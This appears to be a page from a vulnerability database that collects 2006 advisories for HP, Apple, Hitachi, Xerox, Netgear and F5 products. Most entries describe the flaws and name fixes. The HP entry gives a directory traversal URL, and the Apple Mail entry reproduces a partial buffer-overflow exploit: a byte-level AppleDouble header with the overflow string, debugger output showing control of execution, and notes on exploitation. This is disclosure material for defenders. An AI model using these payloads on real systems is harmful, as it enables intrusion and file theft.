VARIoT IoT vulnerabilities database
VAR-200604-0081 | CVE-2006-1654 | HP Color LaserJet 2500/4600 Toolbox Directory Traversal Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in the HP Color LaserJet 2500 Toolbox and Color LaserJet 4600 Toolbox on Microsoft Windows before 20060402 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP GET request to TCP port 5225. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid attackers in further attacks.
The vulnerability is caused due to an input validation error in the
built-in HTTP server. This can be exploited to disclose the contents
of arbitrary files via directory traversal attacks.
Example:
http://[host]:5225/../../../[file]
SOLUTION:
Update to version 3.1.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200604-0468 | CVE-2006-0401 | Apple MAC OS X Unknown vulnerability |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in Mac OS X before 10.4.6, when running on an Intel-based computer, allows attackers with physical access to bypass the firmware password and log on in Single User Mode via unspecified vectors. Mac OS X running on Intel-based Macintosh computers is prone to an authentication-bypass vulnerability.
SOLUTION:
Update to version 10.4.6.
http://www.apple.com/support/downloads/
PROVIDED AND/OR DISCOVERED BY:
The vendor credits David Pugh, University of Michigan.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=303567
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200604-0420 | CVE-2006-1609 | XFIT / S Unknown Denial Of Service Attack Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in Hitachi XFIT/S, XFIT/S/JCA, XFIT/S/ZGN, and XFIT/S ZENGIN TCP/IP Procedure allows remote attackers to cause a denial of service (server process and transfer control process stop) when the products "receive data unexpectedly". There are unknown vulnerabilities in Hitachi XFIT / S, XFIT / S / JCA, XFIT / S / ZGN, and XFIT / S ZENGIN TCP / IP. (The server process and the transmission control process stop). XFIT/S is prone to a denial-of-service vulnerability.
The vulnerability presents itself when the application receives data unexpectedly.
Due to a lack of details, further information cannot be provided at the moment. This BID will be updated when more details become available
VAR-200604-0404 | CVE-2006-1574 | Hitachi Groupmax Desktop for Scheduler World Wide Web Unknown Cross-Site Scripting Attack Vulnerability |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Groupmax World Wide Web, World Wide Web Desktop, World Wide Web for Scheduler, and Desktop for Scheduler, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks
VAR-200603-0199 | CVE-2006-1532 | PHP Classifieds Search.PHP Cross-Site Scripting Vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in search.php in PHP Classifieds 6.18, 6.20, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the searchword parameter. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Input passed to the "searchword" parameter in "search.php" isn't
properly sanitised before being returned to the user.
SOLUTION:
Edit the source code to ensure that input is properly sanitised.
PROVIDED AND/OR DISCOVERED BY:
Preddy, RootShell Security Group
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200603-0287 | CVE-2006-1357 | F5 Firepass 4100 SSL VPN Cross-Site Scripting Vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in my.support.php3 in F5 Firepass 4100 SSL VPN 5.4.2 allows remote attackers to inject arbitrary web script or HTML via the s parameter. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Input passed to the "s" parameter in "my.support.php3" isn't properly
sanitised before being returned to the user. Other versions may also be affected.
SOLUTION:
Do not follow links from untrusted sources or visit untrusted web
sites while being logged in to the VPN.
PROVIDED AND/OR DISCOVERED BY:
ILION Research Labs
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200603-0271 | CVE-2006-0400 | Apple Mail buffer overflow vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
CoreTypes in Apple Mac OS X 10.4 up to 10.4.5 allows remote attackers to bypass the same-origin policy and execute Javascript in other domains via unknown vectors involving "crafted archives.". Apple Mail contains a buffer overflow that may allow a remote attacker to execute arbitrary code on a vulnerable system. Apple Safari is susceptible to a same-origin policy violation. This issue is due to the application's failure to properly enforce same-origin policy for JavaScript remote data access.
An attacker may create a malicious webpage that can access the properties of another domain. This may lead to disclosure of sensitive information or may facilitate other attacks against a user of the browser. Safari is a WEB browser bundled with Apple's family of operating systems. But under certain circumstances, a maliciously crafted document can bypass these restrictions and execute arbitrary code in the user's browser
VAR-200603-0281 | CVE-2006-0396 | Apple Mac OS X Mail Message Attachment Remote Buffer Overflow Vulnerability |
CVSS V2: 5.1 CVSS V3: - Severity: MEDIUM |
Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment. Mac OS X Mail is prone to a remote buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer. A successful exploit may facilitate a compromise of the underlying computer.
This issue is present in Apple Mail when 'Security Update 2006-001' is applied. An attacker can trigger this vulnerability by sending a specially crafted MIME-encapsulated Macintosh file containing an AppleDouble header. Download Validation is used to warn the user if the file type is not "safe". Prior
to 2006-001 certain techniques could be used to disguise a file's type so that the validation
was bypassed. Unfortunately in the process of patching the previous problem a new one was
introduced.
After applying Security Update 2006-001 Mail.app becomes vulnerable to a buffer overflow that
may be triggered via a properly formatted MIME Encapsuled Macintosh file. Sending a file in
the AppleDouble format with a long Real Name entry will invoke the overflow. Reading through
RFC1740 should provide enough information to trigger the issue. The overflow is triggered
by the file that contains the AppleDouble header information.
The format of the header we need to send is as follows:
[4 byte magic num][4 byte version num][16 bytes of filler][2 byte num of entries][Entry...]
Entry descriptor for each Entry:
[4 byte entry id][4 byte offset][4 byte length]
Using the above layout we come up with the following code snippet for our exploit.
"\x00\x05\x16\x07". # AppleDouble Magic Number
"\x00\x02\x00\x00". # Version 2
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of filler
"\x00\x03\x00\x00". # Number of entries (3)
"\x00\x09\x00\x00". # Entry ID 9 is for 'Finder Info'
"\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3e
"\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10
"\x00\x03\x00\x00". # Entry ID 3 is for 'Real Name'
"\x00\x48\x00\x00". # Start of Real Name data is at file offset 0x48
"\x00\xf5\x00\x00". # Length of Real Name is 0xf5 or 245
"\x00\x02\x00\x00". # Entry ID 2 is for 'Resource Fork'
"\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013d
"\x05\x3a\x00\x00". # Length of Resource fork is 0x053a
"\x00\x00\x00\x00". # <null> filler
"\x00\x00\x00\x00". # <null> filler
"A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above.
If a message with the above header arrived in your inbox on Mail.app you would see only the
first 11 characters of the name provided by the Real Name entry. In this particular case you
see "AAAAAAAAAAA...mov" . Other examples could be "SuperTastey...mov" or NakedChicks...mov" .
The visual aspects of the (...) are surprisingly not that suspicious.
Upon double clicking the attached file on the arrived email the following dump is created.
Date/Time: 2006-03-04 10:35:32.472 -0500
OS Version: 10.4.5 (Build 8H14)
Report Version: 4
Command: Mail
Path: /Applications/Mail.app/Contents/MacOS/Mail
Parent: WindowServer [64]
Version: 2.0.7 (746.2)
Build Version: 1
Project Name: MailViewer
Source Version: 7460200
PID: 271
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140
If we take a look at this in gdb we can see that several things are overwirtten.
(gdb) bt
#0 0x41424344 in ?? ()
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313131
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
#1 0x41424344 in ?? ()
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313131
warning: Previous frame identical to this frame (corrupt stack?)
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313139
We control r0, pc, lr and half of r31.
(gdb) i r $r0 $pc $lr $r31
r0 0x41424344 1094861636
pc 0x41424344 1094861636
lr 0x41424344 1094861636
r31 0x18b3030 25899056
Exploitation of this issue seems possible however there are currently some limitations
with regard to what can and can not be done.
The first issue involves previous exploitation attempts and the temporary files left
behind by such attempts.
k-fs-ibook:~ test$ ls -al /var/tmp/folders.502/TemporaryItems/ ~/Library/Mail\ Downloads/
/Users/test/Library/Mail Downloads/:
total 352
drwx------ 7 test admin 238 Mar 13 22:42 .
drwx------ 23 test admin 782 Mar 12 15:52 ..
drwx------ 3 test admin 102 Mar 13 22:42 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0000
11112222ABCD3333zzz.mov.mailhold
/var/tmp/folders.502/TemporaryItems/:
total 352
drwxr-xr-x 4 test wheel 136 Mar 13 22:38 .
drwx------ 3 test wheel 102 Mar 12 10:35 ..
-rwxr-xr-x 1 test wheel 90000 Mar 13 22:44 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa00001
1112222ABCD3333zzz.mov.mov
The existance of a particular temporary file can halt the actions of an exploit attempting
to take advantage of this issue. While developing an exploit keeping the two folders shown
above clean is critical! The temporary files appear to be created during the process of
previewing a message. In some cases they may not be created due to failed mkstemp() calls.
The next issue centers around the fact that RFC1740 states that the Real Name entry can
only contain 7bit printable ascii, using shellcode addresses with 0xff and 0xbf will not
be possible because of this. This obviously eliminates alot of easy shellcode addresses
unfortunately.
0xbfffe6e1: "Users/test/Library/Mail Downloads/", 'a' <repeats 166 times>...
0xbfffe7a9: 'a' <repeats 52 times>, "00\032\xff\xf8"
Code in other areas seems to be either in an unreliable location or in a unicode format.
I am really not in the mood to hunt around memory for a stable address but I am sure that
something could be put together to exploit this.
Here is an example of the Unicode strings that can be found in memory at random places.
(gdb) x/30a $r29
0x18b8a00: 0xa28e6424 0x12100000 0x2f0055 0x730065
0x18b8a10: 0x720073 0x2f0074 0x650073 0x74002f
0x18b8a20: 0x4c0069 0x620072 0x610072 0x79002f
0x18b8a30: 0x4d0061 0x69006c 0x200044 0x6f0077
0x18b8a40: 0x6e006c 0x6f0061 0x640073 0x2f0061
0x18b8a50: 0x610061 0x610061 0x610061 0x610061
0x18b8a60: 0x610061 0x610061 0x610061 0x610061
0x18b8a70: 0x610061 0x610061
On x86 the Unicode *may* not be a problem however I do not have access to an intel based
mac so I can not confirm this. On PowerPC however for the time being there is not much
I can do on the Unicode front. I am not aware of any Venetian style PowerPC lovin at the
moment.
For the time being my exploitation has not gone beyond what I have documented here. Beyond
the few hurdles I have outlined may lie a few more, but who knows? Good luck.
Work Around:
Install 2006-002 update or simply do not open attachments in Mail.app
http://www.apple.com/support/downloads/
Sidenote:
Much thanks to Apple for the quick turnaround time and prompt weekend responses! A same
day response and 9 day turn around is hard to beat
VAR-200603-0472 | CVE-2006-1249 | Apple QuickTime FlashPix integer overflow |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Integer overflow in Apple QuickTime Player 7.0.3 and 7.0.4 and iTunes 6.0.1 and 6.0.2 allows remote attackers to execute arbitrary code via a FlashPix (FPX) image that contains a field that specifies a large number of blocks. Apple QuickTime fails to properly handle FlashPix images. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service condition. Two vulnerabilities have been reported in Apple QuickTime and iTunes:
- an integer overflow
- a heap-based buffer overflow
These issues affect both Mac OS X and Microsoft Windows releases of the software.
A successful exploit will result in the execution of arbitrary code in the context of the currently logged-in user. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats. An attacker
could exploit these vulnerabilities by convincing a user to access
a specially crafted image or media file with a vulnerable version
of QuickTime. Since QuickTime configures most web browsers to
handle QuickTime media files, an attacker could exploit these
vulnerabilities using a web page.
For more information, please refer to the Vulnerability Notes.
II. For further information,
please see the Vulnerability Notes.
III.
Disable QuickTime in your web browser
An attacker may be able to exploit this vulnerability by persuading
a user to access a specially crafted file with a web
browser. Disabling QuickTime in your web browser will defend
against this attack vector. For more information, refer to the
Securing Your Web Browser document.
Appendix A. Please send
email to <cert@cert.org> with "TA06-132B Feedback VU#289705" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2006 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
May 12, 2006: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBRGT7JH0pj593lg50AQI2Uwf/U3zGDrR8UkWK4ry6AYMS7HPMdbiF6Vmo
9gP9Luc6Kj8zzxCWhnNKNzEq2P0B1oD03WcPFaIPnwvQJGApeUDRimyhQj8RDjME
yAUt/reWG7RZ0Z2w/qaiZP7pQ7SjyIUKkN2OCG8LMmGKqsiCdFXoss/Bu0yFMH11
uvgwibfvkOdRLAPmRTVWk+gJEAdw3xFySm9r92qmig6CxKi7GAIpi9Gf7MXcRsKg
oG3y5f06Kiq8ACYszPKneHE7WNvLP1ewuaWmf7PHiNebAB+W5hfwA2yEh6e6PSV2
eBi5cpigfXBrsjXk4L7wYrD8UcRl7nN8iqzWpMwYJkSloUmcYL1BBg==
=LsFu
-----END PGP SIGNATURE-----
. ____________________________________________________________________
McAfee, Inc.
McAfee Avert\x99 Labs Security Advisory
Public Release Date: 2006-05-11
Apple QuickDraw/QuickTime Multiple Vulnerabilities
CVE-2006-1249, CVE-2006-1453, CVE-2006-1454, CVE-2006-1459, CVE-2006-1460, CVE-2006-1461, CVE-2006-1462, CVE-2006-1464, CVE-2006-1465
______________________________________________________________________
* Synopsis
Apple QuickTime and Apple QuickDraw are multimedia technologies used to process image, audio and video data.
Two code execution vulnerabilities are present in QuickDraw PICT image format support.
Twenty one code execution vulnerabilities are present in QuickTime support for various multimedia formats including: MOV, H.264, MPEG 4, AVI, FPX and SWF. In order for an attack to succeed user interaction is required and therefore the risk factor for these issues is medium.
CVE-2006-1459
Seven integer overflow vulnerabilities are present in QuickTime MOV video format support.
CVE-2006-1460
Five buffer overflow vulnerabilities are present in QuickTime MOV video format support.
CVE-2006-1461
Two buffer overflow vulnerabilities are present in QuickTime Flash (SWF) support.
CVE-2006-1462
Three integer overflow vulnerabilities are presenting QuickTime H.264 (M4V) video format support.
CVE-2006-1464
One buffer overflow vulnerability is present in QuickTime MPEG4 (M4P) video format support.
CVE-2006-1465
One buffer overflow vulnerability is present in QuickTime AVI video format support.
______________________________________________________________________
* Legal Notice
Copyright (C) 2006 McAfee, Inc.
The information contained within this advisory is provided for the convenience of McAfee\x92s customers, and may be redistributed provided that no fee is charged for distribution and that the advisory is not modified in any way. McAfee makes no representations or warranties regarding the accuracy of the information referenced in this document, or the suitability of that information for your purposes.
McAfee, Inc. and/or its affiliated companies in the United States and/or other Countries. All other registered and unregistered trademarks in this document are the sole property of their respective owners.
______________________________________________________________________
.
Technical Description:
In an fpx file, there is a field that figures out how many blocks of
data there are in that file. One block data size is 0x200, QuickTime
Player will allocate memory relying on (number*0x200) but does not check
the size value and an integer overflow can occur. If you set the block
value to 0x800000 an integer overflow will occur which will then cause a
heap overflow and write invalid memory.
QuickTime: QuickTime File Format
http://developer.apple.com/documentation/QuickTime/QTFF/index.html
Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Blink - Endpoint Vulnerability Prevention - preemptively protects from
this vulnerability.
Vendor Status:
Apple has released a patch for this vulnerability information is
available at http://docs.info.apple.com/article.html?artnum=61798
Credit:
Discovery: Fang Xing
Copyright (c) 1998-2006 eEye Digital Security Permission is hereby
granted for the redistribution of this alert electronically. It is not
to be edited in any way without express consent of eEye. If you wish to
reprint the whole or any part of this alert in any other medium
excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information.
TITLE:
QuickTime Multiple Code Execution Vulnerabilities
SECUNIA ADVISORY ID:
SA20069
VERIFY ADVISORY:
http://secunia.com/advisories/20069/
CRITICAL:
Highly critical
IMPACT:
DoS, System access
WHERE:
>From remote
SOFTWARE:
Apple Quicktime 4.x
http://secunia.com/product/7923/
Apple Quicktime 5.x
http://secunia.com/product/215/
Apple Quicktime 6.x
http://secunia.com/product/810/
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Multiple vulnerabilities have been reported in QuickTime, which can
be exploited by malicious people to compromise a user's system.
3) A boundary error within the processing of Flash movies can be
exploited via a specially crafted Flash movie to crash the
application and potentially execute arbitrary code.
4) An integer overflow and boundary error within the processing of
H.264 movies can be exploited via a specially crafted H.264 movie to
crash the application and potentially execute arbitrary code.
5) A boundary error within the processing of MPEG4 movies can be
exploited via a specially crafted MPEG4 movie to crash the
application and potentially execute arbitrary code.
7) A boundary error within the processing of AVI movies can be
exploited via a specially crafted AVI movie to crash the application
and potentially execute arbitrary code.
8) Two boundary errors within the processing of PICT images can be
exploited to either cause a stack-based via a PICT image with
specially crafted font information or a heap-based buffer overflow
via a PICT image with specially crafted image data. This can be
exploited to crash the application and potentially execute arbitrary
code.
9) A boundary error within the processing of BMP images can be
exploited via a specially crafted BMP image to crash the application
and potentially execute arbitrary code.
SOLUTION:
Update to version 7.1.
http://www.apple.com/support/downloads/quicktime71.html
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor.
2) Mike Price of McAfee AVERT Labs and Sowhat of Nevis Labs.
3) Mike Price, McAfee AVERT Labs.
4) Mike Price of McAfee AVERT Labs and ATmaCA.
5) Mike Price, McAfee AVERT Labs.
6) Fang Xing of eEye Digital Security and Mike Price of McAfee AVERT
Labs.
7) Mike Price, McAfee AVERT Labs.
8) Mike Price, McAfee AVERT Labs.
9) Tom Ferris
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=303752
eEye Digital Security:
http://www.eeye.com/html/research/advisories/AD20060511.html
Zero Day Initiative:
http://www.zerodayinitiative.com/advisories/ZDI-06-015.html
Sowhat:
http://secway.org/advisory/AD20060512.txt
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200603-0444 | CVE-2006-1220 | Apple Mac OS X Kernel MACH_MSG_SEND Local Heap Overflow Vulnerability |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
Integer overflow in the mach_msg_send function in the kernel for Mac OS X might allow local users to execute arbitrary code via unknown attack vectors related to a large message header size, which leads to a heap-based buffer overflow. Apple Mac OS X kernel is prone to a local heap-overflow vulnerability.
Specifically, the vulnerability affects the 'mach_msg_send()' function of the kernel. A successful attack may result in a complete compromise. Failed exploit attempts will most likely result in a denial-of-service condition.
All versions of the operating system are considered be vulnerable. A local attacker could exploit this vulnerability to gain complete control
VAR-200603-0106 | CVE-2006-1139 | Xerox CopyCentre and Xerox WorkCentre Pro ESS/ Network Controller Unknown vulnerability |
CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in the ESS/ Network Controller in Xerox CopyCentre and Xerox WorkCentre Pro, running software 1.001.02.073 or earlier, or 1.001.02.074 before 1.001.02.715, causes the Immediate Image Overwrite feature to fail after a power loss, which could leave data exposed to attack. CopyCentre C75 is prone to a remote security vulnerability.
TITLE:
Xerox CopyCentre / WorkCentre Pro Multiple Denial of Service
Vulnerabilities
SECUNIA ADVISORY ID:
SA19146
VERIFY ADVISORY:
http://secunia.com/advisories/19146/
CRITICAL:
Moderately critical
IMPACT:
Unknown, DoS
WHERE:
>From remote
OPERATING SYSTEM:
Xerox CopyCentre
http://secunia.com/product/8595/
Xerox WorkCentre Pro
http://secunia.com/product/4553/
DESCRIPTION:
Some vulnerabilities have been reported in Xerox CopyCentre and Xerox
WorkCentre Pro, where one has an unknown impact, and others can be
exploited by malicious people to cause a DoS (Denial of Service).
1) An unspecified boundary error in the PostScript file interpreter
can be exploited to cause a buffer overflow.
Successful exploitation causes a denial of service on a vulnerable
device.
2) Two unspecified errors in the handling of PostScript files can be
exploited to cause a denial of service on a vulnerable device via a
specially crafted PostScript file.
3) An unspecified error in the built-in web server can be exploited
to cause a memory corruption.
Successful exploitation causes a denial of service on a vulnerable
device.
The vulnerabilities affect the following products:
* Xerox CopyCentre C65, C75, and C90.
* Xerox WorkCentre Pro 65, 75, and 90.
SOLUTION:
Install System Software Version 1.001.02.074 or 1.001.02.716 (the
software versions can be obtained by contacting Xerox customer
support).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.xerox.com/downloads/usa/en/c/cert_XRX06_002.pdf
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200603-0097 | CVE-2006-1137 | Xerox WorkCentre / CopyCentre Multiple unknown vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Multiple unspecified vulnerabilities in Xerox CopyCentre and Xerox WorkCentre Pro, running software 1.001.02.073 or earlier, or 1.001.02.074 before 1.001.02.715, allow remote attackers to cause an unspecified denial of service via a crafted PostScript file that will (1) "navigate through the directory" or (2) a "file sent to expose TCP/IP ports". Xerox WorkCentre / CopyCentre are prone to multiple vulnerabilities.
Exploiting these issues can allow remote attackers to trigger a denial-of-service condition in a device. Some of these issues may allow for arbitrary code execution as well, but this is unconfirmed.
These software versions are vulnerable:
- 1.001.02.073 or prior
- Versions greater than 1.001.02.074 but less than 1.001.02.715.
1) An unspecified boundary error in the PostScript file interpreter
can be exploited to cause a buffer overflow.
Successful exploitation causes a denial of service on a vulnerable
device.
3) An unspecified error in the built-in web server can be exploited
to cause a memory corruption.
Successful exploitation causes a denial of service on a vulnerable
device.
4) An unspecified error in the ESS / Network Controller causes an
image overwrite to fail in certain situations after a power loss.
* Xerox WorkCentre Pro 65, 75, and 90.
SOLUTION:
Install System Software Version 1.001.02.074 or 1.001.02.716 (the
software versions can be obtained by contacting Xerox customer
support).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.xerox.com/downloads/usa/en/c/cert_XRX06_002.pdf
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200603-0054 | CVE-2006-1068 | Netgear Multiple router denial of service vulnerability |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
Netgear 614 and 624 routers, possibly running VXWorks, allow remote attackers to cause a denial of service by sending a malformed DCC SEND string to an IRC channel, which causes an IRC connection reset, possibly related to the masquerading code for NAT environments, and as demonstrated via (1) a DCC SEND with a single long argument, or (2) a DCC SEND with IP, port, and filesize arguments with a 0 value. Netgear Router is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected application, denying service to legitimate users
VAR-200603-0105 | CVE-2006-1138 | Xerox WorkCentre / CopyCentre Multiple unknown vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in the web server code in Xerox CopyCentre and Xerox WorkCentre Pro, running software 1.001.02.073 or earlier, or 1.001.02.074 before 1.001.02.715, allows remote attackers to cause a denial of service (memory corruption) via unknown vectors. Xerox WorkCentre / CopyCentre are prone to multiple vulnerabilities.
Exploiting these issues can allow remote attackers to trigger a denial-of-service condition in a device. Some of these issues may allow for arbitrary code execution as well, but this is unconfirmed.
These software versions are vulnerable:
- 1.001.02.073 or prior
- Versions greater than 1.001.02.074 but less than 1.001.02.715.
1) An unspecified boundary error in the PostScript file interpreter
can be exploited to cause a buffer overflow.
Successful exploitation causes a denial of service on a vulnerable
device.
2) Two unspecified errors in the handling of PostScript files can be
exploited to cause a denial of service on a vulnerable device via a
specially crafted PostScript file.
3) An unspecified error in the built-in web server can be exploited
to cause a memory corruption.
Successful exploitation causes a denial of service on a vulnerable
device.
4) An unspecified error in the ESS / Network Controller causes an
image overwrite to fail in certain situations after a power loss.
* Xerox WorkCentre Pro 65, 75, and 90.
SOLUTION:
Install System Software Version 1.001.02.074 or 1.001.02.716 (the
software versions can be obtained by contacting Xerox customer
support).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.xerox.com/downloads/usa/en/c/cert_XRX06_002.pdf
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
